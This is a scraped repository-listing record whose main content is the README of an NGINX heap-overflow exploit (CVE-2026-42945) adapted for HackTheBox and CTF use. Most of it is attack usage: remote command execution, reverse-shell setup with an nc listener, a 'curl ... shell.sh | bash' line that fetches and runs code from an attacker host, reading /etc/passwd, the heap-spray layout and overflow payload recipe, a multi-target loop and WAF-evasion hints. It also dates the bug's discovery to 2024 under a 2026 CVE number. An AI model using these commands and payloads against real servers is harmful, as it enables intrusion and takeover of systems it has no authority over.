[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-81036":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":13,"stars7d":15,"stars30d":12,"stars90d":14,"forks30d":14,"starsTrendScore":16,"compositeScore":17,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":18,"fork":18,"defaultBranch":19,"hasWiki":20,"hasPages":18,"topics":21,"createdAt":9,"pushedAt":9,"updatedAt":22,"readmeContent":23,"aiSummary":24,"trendingCount":14,"starSnapshotCount":14,"syncStatus":25,"lastSyncTime":26,"discoverSource":27},81036,"CVE-2026-42945-POC","cipherspy\u002FCVE-2026-42945-POC","cipherspy","exploit for CVE-2026-42945",null,"Python",37,8,1,0,7,3,2.86,false,"main",true,[],"2026-06-12 02:04:10","# CVE-2026-42945 (NGINX Rift) - HTB-Ready Exploit\n\nStandalone exploit for the NGINX heap buffer overflow vulnerability discovered in 2024. This version is optimized for HackTheBox and CTF environments where you can't set up Docker containers.\n\n## Vulnerability Details\n\n**CVE-2026-42945** is a critical heap buffer overflow in NGINX's `ngx_http_rewrite_module` that has existed since 2008 (version 0.6.27). The bug occurs when:\n\n1. A `rewrite` directive contains `?` in the replacement (sets `is_args = 1`)\n2. A `set` directive captures part of the URI\n3. The length calculation happens on a zeroed sub-engine (sees `is_args = 0`)\n4. The copy phase runs on the main engine (sees `is_args = 1`)\n5. URI escaping expands characters 3x, overflowing the undersized buffer\n\n### Affected Versions\n- **NGINX Open Source**: 0.6.27 - 1.30.0\n- **NGINX Plus**: R32 - R36\n\n### Fixed Versions\n- **NGINX Open Source**: 1.31.0, 1.30.1\n- **NGINX Plus**: R36 P4, R35 P2, R32 P6\n\n## Files Included\n\n1. **nginx_rift_htb.py** - Main exploit script\n2. **nginx_rift_helper.py** - Reconnaissance and info leak helper\n3. **README.md** - This file\n\n## Requirements\n\n```bash\n# Python 3.6+\nsudo apt update\nsudo apt install python3 netcat-openbsd\n\n# No additional Python packages needed - uses only stdlib!\n```\n\n## Quick Start\n\n### 1. Check if Target is Vulnerable\n\n```bash\npython3 nginx_rift_htb.py --target 10.10.11.x --check-only\n```\n\nThis will:\n- Detect if NGINX is running\n- Try to identify the version\n- Check for the `\u002Fapi\u002F` endpoint\n- Report if target appears vulnerable\n\n### 2. Reconnaissance (Recommended)\n\n```bash\npython3 nginx_rift_helper.py --target 10.10.11.x --all\n```\n\nThis performs:\n- NGINX fingerprinting\n- Version detection\n- Endpoint discovery\n- Information leak detection\n- Behavioral analysis\n\n### 3. Run the Exploit\n\n**Execute a command:**\n```bash\npython3 nginx_rift_htb.py --target 10.10.11.x --port 80 --cmd \"id\"\n```\n\n**Get a reverse shell:**\n```bash\n# Start listener first (in another terminal)\nnc -lvnp 4444\n\n# Run exploit\npython3 nginx_rift_htb.py --target 10.10.11.x --shell --lhost 10.10.14.5 --lport 4444\n```\n\n## Usage Examples\n\n### Basic Command Execution\n\n```bash\n# Execute 'id' command\npython3 nginx_rift_htb.py --target 10.10.11.23 --cmd \"id\"\n\n# Execute 'whoami'\npython3 nginx_rift_htb.py --target 10.10.11.23 --cmd \"whoami\"\n\n# Read \u002Fetc\u002Fpasswd\npython3 nginx_rift_htb.py --target 10.10.11.23 --cmd \"cat \u002Fetc\u002Fpasswd\"\n```\n\n### Reverse Shell\n\n```bash\n# Terminal 1: Start listener\nnc -lvnp 4444\n\n# Terminal 2: Run exploit\npython3 nginx_rift_htb.py \\\n    --target 10.10.11.23 \\\n    --shell \\\n    --lhost 10.10.14.5 \\\n    --lport 4444 \\\n    --verbose\n```\n\n### Custom Addresses (If ASLR is disabled or you have leaks)\n\n```bash\npython3 nginx_rift_htb.py \\\n    --target 10.10.11.23 \\\n    --cmd \"id\" \\\n    --heap-base 0x555555659000 \\\n    --libc-base 0x7ffff77ba000\n```\n\n### Advanced Options\n\n```bash\npython3 nginx_rift_htb.py \\\n    --target 10.10.11.23 \\\n    --port 8080 \\\n    --cmd \"curl http:\u002F\u002F10.10.14.5\u002Fshell.sh | bash\" \\\n    --tries 20 \\\n    --verbose\n```\n\n## Understanding the Exploit\n\n### How It Works\n\n1. **Heap Spray**: The exploit sends multiple POST requests with crafted bodies containing a fake `ngx_pool_cleanup_s` structure\n2. **Overflow Trigger**: Sends a GET request to `\u002Fapi\u002F` with specially crafted URI that will overflow when escaped\n3. **Cleanup Hook**: The overflow corrupts an adjacent pool's cleanup pointer to point to our fake structure\n4. **Code Execution**: When the pool is destroyed, it calls `system()` with our command\n\n### Key Parameters\n\n- **Target bytes**: 6-byte addresses that must contain only URL-safe characters\n- **Spray body**: 4000-byte POST body containing fake cleanup structure\n- **Overflow payload**: 349 'A' + 969 '+' characters that expand 3x during escape\n\n### ASLR Considerations\n\nThe exploit assumes **ASLR is disabled** or you know the addresses. On HTB:\n\n- Some boxes disable ASLR for easier exploitation\n- Others require finding an information leak\n- The helper script can assist with reconnaissance\n\nIf ASLR is enabled, you may need to:\n1. Find an info leak in the application\n2. Brute force (requires many attempts)\n3. Use partial overwrites (advanced)\n\n## Troubleshooting\n\n### \"Target doesn't appear to be running NGINX\"\n\n- Verify the target is actually running NGINX\n- Check if the port is correct\n- May be behind a WAF\u002Fproxy\n\n### \"Could not confirm \u002Fapi\u002F endpoint\"\n\nThe vulnerable configuration requires:\n```nginx\nlocation ~ ^\u002Fapi\u002F(.*)$ {\n    rewrite ^\u002Fapi\u002F(.*)$ \u002Finternal?migrated=true;\n    set $original_endpoint $1;\n}\n```\n\n- The exploit may still work if rewrite+set exist elsewhere\n- Try different common paths: `\u002Fapi\u002F`, `\u002Fadmin\u002F`, `\u002Finternal\u002F`\n\n### \"All exploitation attempts failed\"\n\nPossible reasons:\n1. **ASLR is enabled** - Addresses are randomized\n   - Solution: Find info leak or brute force\n   \n2. **Different libc version** - `system()` at different offset\n   - Solution: Try all offsets with `--verbose`\n   \n3. **Version not vulnerable** - Fixed version or different config\n   - Solution: Verify version with helper script\n   \n4. **WAF\u002FIDS blocking** - Security controls in place\n   - Solution: May need evasion techniques\n\n5. **Wrong endpoint** - Not using rewrite+set combo\n   - Solution: Find the actual vulnerable endpoint\n\n### Verbose Mode\n\nAlways use `--verbose` for debugging:\n\n```bash\npython3 nginx_rift_htb.py --target 10.10.11.23 --cmd \"id\" --verbose\n```\n\nThis shows:\n- Each spray request status\n- Connection attempts\n- Overflow trigger timing\n- Crash detection logic\n\n## HTB-Specific Tips\n\n### Finding Your VPN IP\n\n```bash\n# Find your tun0 IP\nip addr show tun0 | grep inet\n\n# Use this IP for --lhost\npython3 nginx_rift_htb.py --target TARGET --shell --lhost YOUR_TUN0_IP --lport 4444\n```\n\n### Stabilizing Shell\n\nOnce you get initial access:\n\n```bash\n# Upgrade to TTY\npython3 -c 'import pty; pty.spawn(\"\u002Fbin\u002Fbash\")'\n\n# Background and set terminal\nCtrl+Z\nstty raw -echo; fg\nexport TERM=xterm\n```\n\n### Common HTB Enumeration After Shell\n\n```bash\n# Check current user\nid\nwhoami\n\n# Check for flags\nfind \u002F -name \"user.txt\" 2>\u002Fdev\u002Fnull\nfind \u002F -name \"root.txt\" 2>\u002Fdev\u002Fnull\n\n# Check sudo permissions\nsudo -l\n\n# Check SUID binaries\nfind \u002F -perm -4000 2>\u002Fdev\u002Fnull\n```\n\n## Advanced Usage\n\n### Custom Payload Generation\n\nIf you need to customize the payload:\n\n```python\n# Edit the make_body() function in nginx_rift_htb.py\n# Adjust BODY_LEN for different configurations\n# Modify the overflow string (349 'A' + 969 '+')\n```\n\n### Multiple Targets\n\n```bash\n# Create a target list\ncat targets.txt\n10.10.11.23\n10.10.11.24\n10.10.11.25\n\n# Test each one\nwhile read target; do\n    echo \"Testing $target\"\n    python3 nginx_rift_htb.py --target $target --check-only\ndone \u003C targets.txt\n```\n\n### Automated Exploitation\n\n```bash\n#!\u002Fbin\u002Fbash\nTARGET=$1\nLHOST=$2\n\necho \"[*] Starting listener...\"\nnc -lvnp 4444 &\nLISTENER_PID=$!\n\nsleep 2\n\necho \"[*] Running exploit...\"\npython3 nginx_rift_htb.py \\\n    --target $TARGET \\\n    --shell \\\n    --lhost $LHOST \\\n    --lport 4444 \\\n    --verbose\n\nwait $LISTENER_PID\n```\n\n## Technical Details\n\n### Vulnerable Code Pattern\n\n```nginx\nlocation ~ ^\u002Fapi\u002F(.*)$ {\n    rewrite ^\u002Fapi\u002F(.*)$ \u002Finternal?migrated=true;  # Sets is_args=1\n    set $original_endpoint $1;                     # Allocates based on is_args=0\n}\n```\n\n### Exploitation Flow\n\n```\n1. Spray POST → Fill heap with fake cleanup structures\n2. GET \u002Fapi\u002FAAAA...++++...X → Trigger overflow\n3. Overflow corrupts adjacent pool cleanup pointer\n4. Pool destroyed → Calls system(cmd)\n```\n\n### Memory Layout\n\n```\n[Heap Spray Body - 4000 bytes]\n+0:  system_addr (8 bytes)\n+8:  data_addr (8 bytes) \n+16: next (8 bytes, NULL)\n+24: command_string (variable)\n+remaining: padding 'A'\n```\n\n## References\n\n- Original POC: https:\u002F\u002Fgithub.com\u002Fp3Nt3st3r-sTAr\u002FCVE-2026-42945-POC\n- Technical Write-up: https:\u002F\u002Fdepthfirst.com\u002Fresearch\u002Fnginx-rift\n- NGINX Advisory: https:\u002F\u002Fmy.f5.com\u002Fmanage\u002Fs\u002Farticle\u002FK000160932\n- CVE Details: https:\u002F\u002Fcve.mitre.org\u002Fcgi-bin\u002Fcvename.cgi?name=CVE-2026-42945\n\n## Disclaimer\n\nThis tool is provided for educational purposes and authorized security testing only. Using this against systems you don't own or have explicit permission to test is illegal. The author assumes no liability for misuse.\n\n## Credits\n\n- Original vulnerability discovered by [depthfirst](https:\u002F\u002Fdepthfirst.com)\n- Original POC: p3Nt3st3r-sTAr\n- HTB adaptation: Modified for standalone use\n\n## License\n\nEducational\u002FResearch purposes only. Use responsibly.\n","该项目是一个针对CVE-2026-42945漏洞的独立利用工具，该漏洞存在于NGINX的`ngx_http_rewrite_module`模块中，自2008年以来一直存在。核心功能包括检测目标是否易受攻击、执行侦察和信息泄露辅助以及实际利用该漏洞执行命令或获取反向shell。技术特点上，此工具使用Python编写，无需额外安装Python库，仅依赖标准库，并且特别优化了HackTheBox和CTF竞赛环境下的使用体验。适用于网络安全研究人员、渗透测试人员在进行漏洞研究或安全评估时使用，特别是在无法设置Docker容器的受限环境中。",2,"2026-06-11 04:03:17","CREATED_QUERY"]